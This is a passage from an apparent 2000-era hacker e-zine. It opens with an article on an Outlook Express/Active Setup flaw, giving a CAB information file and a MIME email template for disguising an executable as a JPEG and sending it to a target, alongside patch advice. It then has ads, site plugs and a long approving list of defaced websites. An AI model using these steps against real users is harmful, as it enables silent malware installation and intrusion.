"x.jpg" to a email and send it to the client, and the client downloads it using Outlook Express. When he/she VIEWS THE EMAIL (when he/she clicks on the subject in the message window), Outlook Express tries to display the attached "x.jpg" file as a JPEG attachment. For this, it saves the JPEG file in the directory pointed by the environment variable TEMP. This is mapped to C:\WINDOWS\TEMP on most machines. So, "x.jpg" is saved as "C:\WINDOWS\TEMP\x.jpg". Now, if i create a CAB file (with my malicious EXE program in it) and rename it to "x.jpg" and attach it to a email message, it will go to the same location. Outlook Express will fail to display the file (will show an icon with "X" instead). So, I now know the location of the CAB file on the client machine. I can also execute VBScript from the same email message (which contains HTML), which will then create and initialize the Active Setup control to install from the local file (C:\WINDOWS\TEMP\x.jpg). The Active Setup control does not mind the different file extension. Then, when the VBScript asks the control to process the components of the CAB file, the malicious EXE program can execute. Practical Demonstration First, let us build the CAB file. We have the executable EXE program which has to be executed on the target machine. Let's call it ASDF.EXE. This ASDF.EXE could be a non-interactive program which runs silently (as in a real life cracking scenario) without any visual indication of it running. For our example we may make a copy of NOTEPAD.EXE and call it ASDF.EXE. Now, we need to put another file into the CAB. It is a cabinet information file (CIF). An example file is given as follows (with comments). More on creating this file, and fields you can put in it, is present in a description of the Active Setup control given in one of the links at the end of this document. ; Start of ASDF.CIF (note: semicolon is for comment) ; Anything in [] means a section [Version] Signature=$Chicago$ ; DisplayName gives the name that the Active Setup ; control displays when it tries to install the component ; (if you ask it to display progress indicators, etc.) DisplayName=Active Setup Control Sample Exploit ;Require 1MB of free space to start MinFileSize=1000 ; [ASDF] is a section devoted to the dummy ; ASDF component we will fake installing. [ASDF] ; Guess you know this already. DisplayName=ASDF Sample Main Module ; GUID is a unique ID.. guess something unique will do. GUID={AABBCCDD-B00B-FACE-DADA-00AA00BB00CC} ; URLn point to URLs of various CAB files. Our CAB file ; will eventually be disguised (renamed) as a JPG file ; and be stored in "asdf.jpg". so there. URL1="ascb.jpg",3 ; Sizen = compressed/actual size of installation files on disk? ; A dummy value greater than size of "ASDF.EXE" should do. Size1=1417,1430 ; This is important. Commandn gives the name of the ; command (in the CAB file) to execute when installation ; starts. This will be our EXE file. Command1="asdf.exe" ; Type of installation. This field is described in the ; documentation for the Active Setup control. Type1=2 Version=1,00,1234,0 ; 0 = no reboot, 1 = reboot. ; obviously, DON'T REBOOT AFTER INSTALLATION IS COMPLETE! Reboot=0 ; Space occupied by the installed files. A dummy value ; greater than size of "ASDF.EXE" should do. InstalledSize=980,524 ; End of ASDF.CIF We now need a program to create the CAB archive which will contain the two files ASDF.EXE and ASDF.CIF. MAKECAB.EXE, which is included with Microsoft Visual Studio distributions doesn't seem to be able to handle more than one file inside the CAB archive. You may try a shareware program like Archive Explorer available from http://www.dennisre.com/ax/ to create your CAB files. Once your CAB file is created (containing ADSF.EXE and ASDF.CIF), rename the CAB file to ASDF.JPG. Now, the CAB file is ready. Let's move on to the VBScript part. Create a HTML file with the following contents. The contents are described with comments in the file itself. No further explanation should be necessary. Hi Now what? Well, I guess it should be simple now. Create an email message containing the above HTML. Attach the ASDF.JPG file to it. Send it to the target client. A sample email which you can pipe into /usr/lib/sendmail is given as follows. This will work with Outlook Express. Use "/usr/lib/sendmail -t < the_following_text.txt". From: Sender To: Receipient Subject: Hi MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0071_01BF2DD4.558D3F20" This is a multi-part message in MIME format. ------=_NextPart_000_0071_01BF2DD4.558D3F20 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0072_01BF2DD4.558D3F20" ------=_NextPart_001_0072_01BF2DD4.558D3F20 Content-Type: text/plain; charset="us-ascii" Here is a great picture for you....!!! ------=_NextPart_001_0072_01BF2DD4.558D3F20 Content-Type: text/html; charset="us-ascii" Hi Here is a great picture for you....!!! ------=_NextPart_001_0072_01BF2DD4.558D3F20-- ------=_NextPart_000_0071_01BF2DD4.558D3F20 Content-Type: image/jpeg; name="asdf.jpg" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="asdf.jpg" TVNDRgAAAACaSAAAAAAAACwAAAAAAAAAAwEBAAIAAADKUQAAXgAAAAIAAxUA0AA AAAAAAAAA YOUR MIME ENCODED ASDF.JPG FILE (CABINET FILE) GOES HERE. use "mimencode" to encode your file. JzyP5RPpLP721w5JQuJDq4X9V+Lg9T+5N/TYlKJPQO5OhkNNxv/C5VJSf1mvnD/ dkpPBfy+X seZRxIgSPp8AAA== ------=_NextPart_000_0071_01BF2DD4.558D3F20-- . Place your MIME base64 encoded ASDF.JPG file in the place shown above. Remove the lines with the junk characters (watch the spacing). They are retained above as delimiters for your reference. You should put your own MIME encoded ASDF.JPG in place of it. You can MIME encode your file using the "mimencode" program. Cons and defences This bug is BIG. Anyone can do anything with your computer if you use Outlook Express and have not taken precautionary measures. The threat of email viruses, email bombs, etc. cannot be ruled out. More importantly, if your computer contains classified data, this can easily be transferred out. Proxies and firewalls cannot prevent any damage! What can be done? 1. Download the patches from Microsoft's website for the Active Setup control and install them. 2. Junk Outlook Express. It is too intelligent. Use a simple e-mail client such as PINE. 3. Set your TEMP directory to something else. 4. Disable all ActiveX component execution (High security zone). Links http://www.securityfocus.com/bid/775/ - Active Setup control vulnerability details on securityfocus.com. http://msdn.microsoft.com/library/periodic/period98/vbpj0798.ht m - Documentation on the Active Setup control. http://www.microsoft.com/technet/security/bulletin/fq99-048.asp - Microsoft's security bulletin for the vulnerability. http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascont rol.htm - Microsoft's update for the control. http://pages.whowhere.com/computers/cuartangojc/ - Juan Carlos Garcia Cuartango's pages. http://www.securityfocus.com/ - Security news, BUGTRAQ, security related utilities, etc. Author I'm a student of M.Sc. Computer Science. I do security analysis, Linux network security, web development, 3D-game programming, demos, network programming, data compression, etc. I know C, x86 asm. My primary development platform has been Linux for the past 5 years. I love music. I trust opensource systems. This bug scares me and sometimes makes me laugh too. After working on numerous vulnerabilities which needed setting up byte sequences to exploit buffer overflows, and other stuff, this vulnerability comes along. And it says, roll your own EXE file, transfer and execute it on any machine. Beats everything I have seen so far. Please educate people about this bug. This bug is more severe than it seems. Spread the word asking people to download the patches off Microsoft's site and install them. PS: Although I would love to hear from you, please DO NOT bomb me with mail ;) Please keep your discussions on this topic on BUGTRAQ as much as you can. You can get all the information you need in this document and by following the links given above. If you have any problems with the content on this page and want me to take some of it off, please contact me. Cheers! Mukund @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ /\ | | | | (_) (_) / \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _ / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` | / ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| | /_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, | __/ | |___/ ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG ______________________________________________________________ French Hackers' Portal / Le Portail Des Lascars Francophones Links and News of interest / Liens et news pour lascars. ;-) -------------------------------------------------------------- ->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<- ______________________________________________________________ http://revenger.hypermart.net �� 's T E X T Z F I L E HOMEPAGE http://revenger.hypermart.net Here you may find up to 340 text files for: ANARCHY , HACKING , GUIDES , CRACKING , VIRUS , GENERAL , ELECTRONICS , UNIX , MAGAZINES , TOP SECRET , CARDING , U.F.O.s , LOCKPICKING , IRC , PHREAKING , BOOKS AND A-S FILES AVAILABLE! http://revenger.hypermart.net Visit Us Now ! . . ............... . : : . . . . . . __:________ : : ___________ . . . \ < /_____:___ : ( < __( :_______ ) : )______:___\_ (___( : / =====/________|_________/ < | : (________________(====== : (__________________) :wd! . : : : - / - w w w . h a c k u n l i m i t e d . c o m - / - : . . . . . : : . . . . . :...............: . . ************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ************************************************************************** +------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ** * www.csoft.net webhosting, shell, unlimited hits bandwidth ... * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * * * http://www.csoft.net/ * * * * One of our sponsors, visit them now * * * * * * * * * ** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Not much this week, but this is worth a peek .. heh tnx multisync for the url... - Ed http://www.hardocp.com/news_images/2000/february_2000/bsod.jpg @HWA =-----------------------------------------------------------------------= _ _ ___(_) |_ ___ ___ / __| | __/ _ Y __| \__ \ | || __|__ \ |___/_|\__\___|___/ SITE.1 -=- Coding/Software -=- http://www.dragonmount.net/dirc erikR Not security or hack related, well hack as in a code hack maybe..this is a new windows32 based irc client which I think could very well usurp mIRC from its position at #1 for windows. Check it out, the development team is willing to listen to suggestions etc, how often do you get a chance to get your ideas acted on in a new product? ... - Ed -=- Hacking/Security -=- http://hackdesk.dhs.org/ iPulse A new site under major development (but still looking good and working well in this limited fashion) well worth a visit, we'll be hearing and seeing more from HackDesk Labs in the future, I'm sure of it, check it out. - Ed -=- Security -=- http://www.pure-security.net/ This site has come a long way since its inception in fact its founder commonly known as MostHated has come a long way too. The site is very informative, well laid out and professional. Check it out today, and remember the people behind the site know their shit. Blurb from the site; (Verbatim) Services Here we are dedicated to security on whatever it is you want secured, let it be your personal computer, a workstation at your job, your private network or even a corporations network, it doesn't matter as long as they are secure, which is something we emphasize here at PSN. Some people list services in which they want to brag about, because maybe they are specialized in certain area and may charge a flat rate. Well, here we don't, we charge depending on network structure and work being actually done and i guarantee we don't charge probably anywhere close to as high as other firms. We here would rather have your security strong then our pockets filled, because our work makes a difference and that is more important then having a lot of money. Simple contact us with what it is you need done and we will begin to start negotiating a contract type work or whatever it is you want done, because you can even hire one of us to be your security administrator and be dedicated to your network and it's security under your wing. However you want it done, we are here to supply the services and hope to suit your satisfaction with our work. Always remember that your security now could save you a lot of money in the future against malicious type people or just someone who enters your network and makes a mistake. It is a must and we please ask if you don't want our services for your security of your site, then please search somewhere for another firm or do it yourself, as long as your security is one of the top concerns on your network. We hope to be hearing from you and as time goes, we'll give dedicated services or service packages for our clients, but for now, it is whatever you would like done. To contact on getting security help through PSN or just to gain information about how we work, then please contact us here.(most@pure-security.net) -=- Security -=- http://www.csanetworks.com/ The premier site of systemV (Edward Elliot) also an ex gH (Global Hell) member, is looking good, another professional looking site, check her out and scope out the goods from people that can deliver. Blurb from the site: (Verbatim) Why Choose CSANetworks.com? At CSA Networks we have what it takes to get your business or network secure and ready for the day to day hazards of online. From large corporate networks, that have company critical information, to small home networks that are host to the latest quake server, you must be sure you are ready. We here at CSA Networks can provide you the services needed to keep your networks secure. From remote access, to snooping co-workers and the like. We offer one of the most Comprehensive Security Assessments, Risk Analysis, and Client-System Tests in the market, and at a fraction of the price of other competitors. -=- You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ ___| _ \ | | __| _` |\ \ / | | __| _ \ _` | | | ( | ` < | | | __/ ( | \____|_| \__,_| _/\_\\___/ _| \___|\__,_| Note: The hacked site reports stay, especially wsith some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ========================================================================== * Info supplied by the attrition.org mailing list. Cracked webpage archives (list from attrition) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/ http://www.hackernews.com/archive/crackarch.html http://www.freespeech.org/resistance/ http://www.rewted.org/cracked/ http://www.403-security.org/ http://www.projectgamma.com/defaced/ http://www.net-security.org/ http://www.netrus.net/users/beard/pages/hacks/ http://212.205.141.128/grhack/html/default_hacking.html http://194.226.45.195/hacked/hacked.html http://alldas.de/crkidx1.htm http://www.turkeynews.net/Hacked http://www.flashback.se/hack/ http://www.dutchthreat.org/ http://www.onething.com/archive/ http://www.2600.com/hacked_pages/ http://hysteria.sk/hacked/ http://erazor.vrnet.gr/ Cracked sites listed oldest to most recent...does anyone read these? Date OS Group/Person AMCK Site 2000 ~~~~ ~~ ~~~~~~~~~~~~ ~~~~ ~~~~ ~~~~~~~~ [00.02.29] NT [ ] M Itri Rodoferrovia e Servicos Ltda (itri.com.br) [00.02.29] NT [zillion] CompuAll Inc (www2.compuall.net) [00.02.29] NT [Opiat3] Security Bank (www.sec-bank.com) [00.02.29] NT [Crime Boys] Lojas Arno Palavro Ltda (www.lojasarno.com.br) [00.02.29] NT [Crime Boys] Data Brasil (www.databrasil.com.br) [00.02.29] NT [ ] Valhalla Union Free School District (valhalla.k12.ny.us) [00.02.29] NT [Tr1pl3 S31S] C SABA (saba.co.za) [00.02.28] NT [ ] M Sebrae - Servico De Apoio as Micro E Pequenas (www.sebrae-sc.com.br) [00.02.28] Li [g04tz s3kur1ty] Sinnerz (www.sinnerz.com) [00.02.28] NT [ ] C Net Service Assessoria e Informatica (www.rjnet.com.br) [00.02.28] Ir [IZ corp] vof Heksenkethel (www.heksenkethel.nl) [00.02.28] NT [Cyber Fuckers] The Georgia, Ukraine, Uzbekistan, Azerbaijan and Moldova Group (www.guuam.org) [00.02.28] BI [Cyber Fuckers] Embassy of Finland in Ottawa, Canada (www.finemb.com) [00.02.28] NT [Cyber Fuckers] Embassy of Azerbaijan in the USA (www.azembassy.com) [00.02.28] Ir [IZ corp] Animece (www.animece.com.ve) [00.02.27] NT [IZ corp] Working Consultoria e Assessoria em Comunicacao Ltda (www.workingnet.com.br) [00.02.27] Lr [sCr33n DuMp] Zero Tolerance (www.zero-tolerence.com) [00.02.27] So [Starman_Jones] Weston High School (www.westonhighschool.com) [00.02.27] NT [W.H.I.T.E] Thames Valley District School Board (www.tvdsb.on.ca) [00.02.27] NT [grn] REB (www.reb.com) [00.02.27] NT [W.H.I.T.E] Education - Management Board Secretariat (www.ocdsb.edu.on.ca) [00.02.27] Li [DHC] Miss Universe, Trinidad and Tobago (www.missuniverse.co.tt) [00.02.27] NT [Bash] Michigan Section for the American Water Works Association (www.mi-water.org) [00.02.27] NT [KabraLzZ] MexiCom (www.mexicom.com.mx) [00.02.27] NT [VUGO and DD] M HydroPower (www.hydropower.com.br) [00.02.27] NT [W.H.I.T.E] Gonzaga High School, Newfoundland (www.gonzaga.k12.nf.ca) [00.02.27] NT [Arsenationa] Elizabeth City MotoCross Club (www.ecmx.com) [00.02.27] NT [n0p] Chestnut Health Systems (www.chestnut.org) [00.02.27] Ir [IZ corp] Boehme Brasil Consultoria Empresarial Ltda. (www.boehme.com.br) [00.02.27] Li [ncode and dumone] Asia Travels (www.asia-travels.com) [00.02.27] NT [H and X-Girl] Alphaville Ve�culos Ltda (www.alphavel.com.br) [00.02.27] NT [KabraLzZ] Associacao Brasileira da Industria (www.abimaq.org.br) [00.02.27] NT [protokol] M ABC Unified School District (www.abcusd.k12.ca.us) [00.02.27] Lr [GForce Pakistan] University of Wales, Swansea (pyjamas.swan.ac.uk) [00.02.27] NT [t.g.s.u] Jiangsu Economic Information Network (jsfamous.js.cei.gov.cn) [00.02.27] NT [Amatus] Fuzzy Gamer (fuzzygamer.powersurfr.com) [00.02.26] So [kryptek] C Autonomous System of System Architecture Laboratory CE96 Server (ce96.kaist.ac.kr) [00.02.26] NT [Death Knights] Well Computer (www.wellcomputer.com.br) [00.02.26] NT [VUGO and DD] Vivo Desejo Decoracao de Festas Ltda (www.vivodesejo.com.br) [00.02.26] NT [VUGO and DD] Transboy Entregas R�pidas Ltda. (www.transboy.com.br) [00.02.26] Lr [sCr33n DuMp] Seriously Cool (www.seriouslycool.com) [00.02.26] Lr [AnTil00p] Presente (www.presente.com.mx) [00.02.26] NT [skeme] County Kildare Community Network (www.kildare.ie) [00.02.26] Li [Mr_OZZY] IKRO (www.ikro.com.br) [00.02.26] NT [Team eScape] Half Life S.A. (www.half-life.co.za) [00.02.26] Lr [ ] H2SO4 (www.h2so4.org) [00.02.26] NT [Tr1pl3 S31S] Groen Hoek S.A. (www.groenhoek.co.za) [00.02.26] Bf [MindVox] Freakers (www.freakers.org) [00.02.26] NT [zb] Ensoniq Corporation (www.ensoniq.com) [00.02.26] Lr [sCr33n DuMp] Elite Hackers (www.elitehackers.net) [00.02.26] NT [Bash] Computing Edge (www.computingedge.com) [00.02.26] NT [Cyber Fuckers] C Comisi�n Federal de Competencia (www.cfc.gob.mx) [00.02.26] NT [Death Knights] C Botafogo De Fuebol e Regatas (www.botafogo.com.br) [00.02.26] Li [|3|aqU3 W�rM] CapSync Systems Inc. (www.bbmcc.com) [00.02.26] Lr [sCr33n DuMp] A Perfect World (www.aperfectworld.com) [00.02.26] Lr [heataz] AnnuPro (www.annupro.fr) [00.02.26] NT [Team eScape] 2nd Hand Games S.A. (www.2ndhandgames.co.za) [00.02.26] So [kryptek] C Autonomous System of System Architecture Laboratory Former4 Server (former4.kaist.ac.kr) [00.02.26] So [kryptek] CC Club of the Autonomous System of System Architecture Laboratory (ccclub.kaist.ac.kr) [00.02.25] NT [Crime Boys] Xerox Italia (www.xerox.it) [00.02.25] NT [Xhostrile] Vermont National Bank (www.vermontnationalbank.com) [00.02.25] NT [fragile] Cytron Technologies Ltd. (www.tnyw.com) [00.02.25] NT [sk|tz0-NET] Phant0mNet (www.phant0m-net.com) [00.02.25] Li [ ] Net Nuri (www.netnuri.com) [00.02.25] NT [c0rvus] Memphis Library (www.memphislibrary.lib.tn.us) [00.02.25] NT [VUGO and DD] PH Promo��es & Produ��es Artisticas S/C Ltda (www.marceloaguiar.com.br) [00.02.25] So [GForce Pakistan] Levi's Music (www.levismusic.com) [00.02.25] NT [Cyber Fuckers] Associacao Alumni/Alumnae do JMC (www.jmc.org.br) [00.02.25] NT [VUGO] Condom�nio Edificio Royal Dansk (www.haddadseguros.com.br) [00.02.25] NT [rat] DoSolutions (www.dosolutions.com) [00.02.25] NT [ ] Devils Clan (www.devi1.com) [00.02.25] NT [Team Infinity] Converse College (www.converse.edu) [00.02.25] BI [Quant4m] Buns Bunny (www.bunsbunny.com) [00.02.25] NT [Erica] BFNCOL S.A. (www.bfncol.co.za) [00.02.25] NT [Death Knights] Information System and Tecnology Innovation (www.abramo.it) [00.02.25] NT [Team Infinity] Yamaha Motor Europe (www.yme.com) [00.02.25] NT [KabraLzZ] VISAR Informatica Ltda. (www.visar.com.br) [00.02.25] NT [Team Infinity] Southwestern University School of Law (www.swlaw.edu) [00.02.25] NT [VUGO and DD] Nike Taiwan (www.nike.com.tw) [00.02.25] NT [Mr Ozzy] Cursos e Servi�os em Inform�tica Ltda. (www.newworldmd.com.br) [00.02.25] NT [bash] Lima Public Library (www.lima.lib.oh.us) [00.02.25] NT [Tr1pl3 S31S] Kloppers S.A. (www.kloppers.co.za) [00.02.25] NT [Death Knights] C Bricks and Clay Roof Tiles Industry Manufacturer (www.ilr.it) [00.02.25] NT [Team Echo] City Realty (www.citirealty.com) [00.02.25] NT [KabraLzZ] Boca Deurna (www.bocadeurna.com.br) [00.02.25] NT [VUGO and DD] 96 Automation Co. (www.96auto.com.tw) [00.02.25] NT [Aero] Trinity Solutions (trinitysolutions.com) [00.02.24] NT [Mickey Mouse] Theatre UK (www.theatreuk.co.uk) [00.02.24] Li [Death Knights] M Outcome (www.outcome.it) [00.02.24] NT [#Swehack] House of Sin (www.houseofsin.com) [00.02.24] Li [ ] C Gestione immobili ad uso alberghiero (www.amorosa.it) [00.02.23] NT [DS] Racom Corporation (www.racom.net) [00.02.23] NT [idiot] M Daeil Computer Company (www.p3k.com) [00.02.23] NT [Paragon] Interactive Property Network (www.interactiveproperty.net) [00.02.23] NT [fl0w] If Virtual (www.ifvirtual.com) [00.02.23] So [GForce Pakistan] Branden University (www.branden.edu) [00.02.23] So [Team Echo] The Phone Store (www.phonestore.com) [00.02.23] Bf [L|mp & ProSys] Mendonza (www.mendonza.org) [00.02.23] Lr [A0 & Bsd3M0n] M ICM Sport (www.icm-sport.com) [00.02.23] NT [ ] Happy Harry's Inc. (www.happy.com) [00.02.23] NT [ ] Alclagraf Paineis e Com (www.alclagraf.com.br) [00.02.23] NT [ ] TicketPort Name Server (ns.ticketport.co.jp) [00.02.22] NT [Cyber Fuckers] United Nations Educational, Scientific and Cultural Organization in Brazil (www.unesco.org.br) [00.02.22] Li [ZeR0LogiKz] Internet USA Corp. (www.unclesam.net) [00.02.22] NT [TheP|nkPanthe|2] TicketPort (www.ticketport.co.jp) [00.02.22] NT [Team Infinity] Enter Software, Inc. (www.enter.com) [00.02.21] NT [ ] Boston Public Schools (www.boston.k12.ma.us) [00.02.21] NT [Team Echo] Burkina Faso Minist�re de l'Economie et des Finances (www.finances.gov.bf) [00.02.21] NT [Pentaguard] Kuwait Investment Authority (www.kia.gov.kw) [00.02.21] NT [ ] Legion Internet (www.legion.net) [00.02.21] NT [TheP|nkPanthe|2] Irish Property Brokers and Home Seekers (www.theirishconnection.com) [00.02.21] NT [r00t0ff] GameStead (www.gamestead.com) [00.02.21] Bf [Sabu] NDV Private School (ndv.pvt.k12.ca.us) [00.02.20] NT [ ] Globosat Programadora Ltda (www.telecine.com.br) [00.02.20] NT [BlazinWeed] US Army National Guard Bureau Distributive Training Technology Program (dtt.ngb.army.mil) [00.02.20] NT [ ] Globosat Programadora Ltda (www.telecine.com.br) [00.02.20] NT [TheP|nkPanthe|2] Techno Wolf (www.technowolf.com) [00.02.20] Li [Dark 00] The Stile Project (www.stileproject.com) [00.02.20] BI [sysko] Soft-X (www.soft-x.com) [00.02.20] NT [Team Escape] Rayco Car Electronics (www.raycocar.com) [00.02.20] NT [ ] ConaTel Honduras (www.conatel.hn) [00.02.20] NT [Team Infinity] My Track (www.mytrack.com) [00.02.20] Li [m0s] India Links (www.indialinks.co.in) [00.02.20] NT [Tr1pl3 S31S] I-Kon S.A. (www.i-kon.co.za) [00.02.20] NT [Team Escape] BPB Plc. (www.bpb.com) [00.02.20] Li [Argon] Korea Astronomy Observatory (space21.issa.re.kr) [00.02.20] Li [COTDS] Leisure World Korea (leisureworld.co.kr) [00.02.19] NT [Argon] NOAA Nauticus site (www.nauticus.noaa.gov) [00.02.19] NT [ ] National Ocean Service Map Finder (mapfinder.nos.noaa.gov) [00.02.19] NT [confusion] Office of the Speaker of the House (www.speaker.gov) [00.02.19] NT [Cheitan] Belgian Federal Planning Bureau (www.plan.be) [00.02.19] NT [Delta Team] USD 261 Haysville Schools (www.usd261.com) [00.02.19] Li [M3L40] Siroflex Argentina (www.siroflex.com.ar) [00.02.19] NT [M3L40] Renato Pereira Lima Me (www.ruas.com.br) [00.02.19] Li [m0s] Kitchen Grace (www.kitchengrace.com) [00.02.19] So [Paco-Tate] Daily Bread Magazine (www.dbmag.com) [00.02.19] NT [FiFG] Carbocloro S.A. Industrias Quimicas (www.carbocloro.com.br) [00.02.19] NT [Crime Boys] Burp Contest (www.burpcontest.com) [00.02.19] NT [KabraLzZ] M Am�rica Air (www.americaair.com.br) [00.02.19] Li [Argon] C Wooree Lighting Co. (wooree.co.kr) [00.02.19] Li [COTDS] C Inje University Web Info (webinfo.inje.ac.kr) [00.02.19] Li [COTDS] C Dong-Eui University NC Lab (nclab.dongeui.ac.kr) [00.02.19] Li [Argon] Inje University Math Lab (mathlab.inje.ac.kr) [00.02.18] Lr [h2so4 and spl1f] San Diego Supercomputer Center WORM Server (worm.sdsc.edu) [00.02.18] NT [BlackKode] Editora Evolutivo de Material Didatico (www.yupee.com.br) [00.02.18] Li [ ] WarNet (www.war-net.com) [00.02.18] NT [Team Echo] Park Cities Dental (www.parkcitiesdental.com) [00.02.18] NT [Cyber Fuckers] Italian National Institute of Healt (www.iss.it) [00.02.18] Lr [naptime and rich] ISP.Com (www.isp.com) [00.02.18] Lr [Crime Boys] M Ricardo Dreves' Web site (www.dreves.com.br) [00.02.18] Bf [LLT] AudioSeek (www.audioseek.com) [00.02.18] Li [ ] JoyClick TWIS (twis.joyclick.net) [00.02.18] Li [ ] C Seoul National University Seorak Server (seorak.snu.ac.kr) [00.02.18] Li [ ] ThruNet IP Server (s210-219-190-139.thrunet.ne.kr) [00.02.18] Lr [ ] ThruNet (s210-219-159-31.thrunet.ne.kr) [00.02.18] Li [ ] C Seoul National University (maum.snu.ac.kr) [00.02.18] Lr [ ] Booktopia Mail Server (mail.booktopia.com) [00.02.17] NT [ ] Methuen Public Schools (www.methuen.k12.ma.us) [00.02.17] So [complex] JOIN Systems (www.join.com) [00.02.17] So [Team Echo] M Best Buy Computer Shop (bestbuyshop.com.br) [00.02.17] NT [Artech] USD 261 Haysville Schools (www.usd261.com) [00.02.17] NT [BlazinWeed] Surface Mount Conference and Exhibition (www.surfacemount.com) [00.02.17] NT [OA] Steinberg Cellars (www.steinbergcellars.co.nz) [00.02.17] NT [ ] Paul Bunyan Days (www.paulbunyandays.com) [00.02.16] NT [BlazinWeed] California State Assembly (www.assembly.ca.gov) [00.02.16] Bf [Cyrus the Virus] UCH 2K (www.uch2k.org) [00.02.16] So [TREATY] Power IR (www.powerir.com) [00.02.16] NT [Team Echo] HUD Housing Counseling Clearinghouse (www.hudhcc.org) [00.02.16] NT [KabraLzZ] Ciudad de Portiva (www.ciudaddeportiva.org) [00.02.16] NT [BlazinWeed] UK Charity Commission (www.charity-commission.gov.uk) [00.02.16] Bf [Cuzz] Barkley Anderson's Web site (www.barkley.org) [00.02.16] NT [BlazinWeed] Data Systems Integrators, Inc. (websvr.ewol.com) [00.02.16] So [BlackMan] Kumoh National University of Technology (knut.kumoh.ac.kr) [00.02.16] NT [BlazinWeed] NetManage eSolutions (esolutions.netmanage.com) [00.02.15] So [Team Echo] ShadowScape Technologies (www.shadowscape.com) [00.02.15] NT [deface] Rollinsford Grade School (www.rollinsford.k12.nh.us) [00.02.15] NT [BlazinWeed] DeLaSalle Education Center (www.delasallecenter.org) [00.02.15] NT [c0rvus] Axis Sinimbu Logistica Automotiva Ltda (www.asl.com.br) [00.02.15] NT [Artech] Dept of Transportation Office of the CIO (cio.ost.dot.gov) [00.02.15] NT [Artech] DOT Transportation Administrative Services Center (isweb.tasc.dot.gov) [00.02.15] NT [Artech] Innov8 At Work, Office of the Secretary of Transportation (innov8atwork.ost.dot.gov) [00.02.15] NT [Artech] Dept. of Transportation Y2K Web site (y2ktransport.ost.dot.gov) [00.02.15] Li [TheP|nkPanthe|2] Buy 4 Fun (www.buy4fun.com) [00.02.15] Li [metacom] Hex Hackers (www.hexhackers.com) [00.02.14] NT [Cyber Fuckers] C Pedo Watch (www.pedowatch.org) [00.02.14] NT [Team Escape] M TM Guide (www.tmguide.com) [00.02.14] So [Team Echo] Timber Jay (www.timberjay.com) [00.02.14] Bf [Sabu] G-X (www.g-x.net) [00.02.14] Li [dj kensu] ejeet.org (www.ejeet.org) [00.02.14] NT [Scrippie] M Stichting Isolatie Nederlandse Industrie (www.cini.org.uk) [00.02.14] NT [alt3kx] UVC Argentina (www.uvc.com.ar) [00.02.13] NT [Cyber Fuckers] Gobierno del Estado de Chiapas (www.chiapas.gob.mx) [00.02.13] NT [Team Echo] Cuban Instituto de Meteorolog�a (www.met.inf.cu) [00.02.13] NT [Team Echo] H. Lavity Stoutt Community College, British Virgin Islands (www.hlscc.edu.vg) [00.02.13] NT [Cyber Fuckers] United Nations Education, Scientific, and Cultural Organization (www.unesco.org.br) [00.02.13] NT [Team Echo] M CompuNet Israel (www.compunet.co.il) [00.02.13] NT [Team Echo] Trak (www.trak.co.il) [00.02.13] NT [Team Echo] Take Toro (www.take-toro.co.il) [00.02.13] NT [Team Echo] Tagro (www.tagro.co.il) [00.02.13] NT [Team Echo] Super Mass (www.supermass.co.il) [00.02.13] NT [Team Echo] Promo (www.promo.co.il) [00.02.13] NT [Team Echo] MidiCom (www.midicom.co.il) [00.02.13] NT [Team Echo] MegaByte (www.mega-byte.co.il) [00.02.13] NT [Team Echo] Dotan (www.m-dotan.co.il) [00.02.13] NT [Team Echo] Hagay Motorcycles (www.hagay-motorcycles.co.il) [00.02.13] NT [Team Echo] Guiding Service (www.guidingservice.co.il) [00.02.13] NT [Team Echo] Bet N Chat (www.betnchat.co.il) [00.02.13] So [Dor] SiliconNet Technologies Sdn.Bhd. (www.snt.com.my) [00.02.13] Bf [Tek] PMT Africa (www.pmtafrica.co.za) [00.02.13] Li [kingstr0ke] Planet HQ (www.planethq.com) [00.02.13] NT 